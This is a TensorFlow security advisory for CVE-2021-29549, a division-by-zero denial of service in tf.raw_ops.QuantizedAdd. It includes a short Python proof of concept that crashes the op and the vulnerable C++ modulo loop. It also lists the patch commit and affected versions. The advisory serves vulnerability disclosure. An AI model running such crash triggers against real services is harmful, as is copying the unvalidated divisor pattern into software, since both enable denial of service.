## TFSA-2021-037: Division by 0 in `QuantizedAdd`

### CVE Number
CVE-2021-29549

### Impact
An attacker can cause a runtime division by zero error and denial of service in
`tf.raw_ops.QuantizedAdd`:

```python
import tensorflow as tf

x = tf.constant([68, 228], shape=[2, 1], dtype=tf.quint8)
y = tf.constant([], shape=[2, 0], dtype=tf.quint8)

min_x = tf.constant(10.723421015884028)
max_x = tf.constant(15.19578006631113)
min_y = tf.constant(-5.539003866682977)
max_y = tf.constant(42.18819949559947)

tf.raw_ops.QuantizedAdd(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)
```

This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/6f26b3f3418201479c264f2a02000880d8df151c/tensorflow/core/kernels/quantized_add_op.cc#L289-L295)
computes a modulo operation without validating that the divisor is not zero.

```cc
void VectorTensorAddition(const T* vector_data, float min_vector,
                          float max_vector, int64 vector_num_elements,
                          const T* tensor_data, float min_tensor,
                          float max_tensor, int64 tensor_num_elements,
                          float output_min, float output_max, Toutput* output) {
  for (int i = 0; i < tensor_num_elements; ++i) {
    const int64 vector_i = i % vector_num_elements;
    ...
  }
}
```

Since `vector_num_elements` is [determined based on input
shapes](https://github.com/tensorflow/tensorflow/blob/6f26b3f3418201479c264f2a02000880d8df151c/tensorflow/core/kernels/quantized_add_op.cc#L522-L544),
a user can trigger scenarios where this quantity is 0.

### Patches
We have patched the issue in GitHub commit
[744009c9e5cc5d0447f0dc39d055f917e1fd9e16](https://github.com/tensorflow/tensorflow/commit/744009c9e5cc5d0447f0dc39d055f917e1fd9e16).

The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.

### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.

### Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu
X-Team.
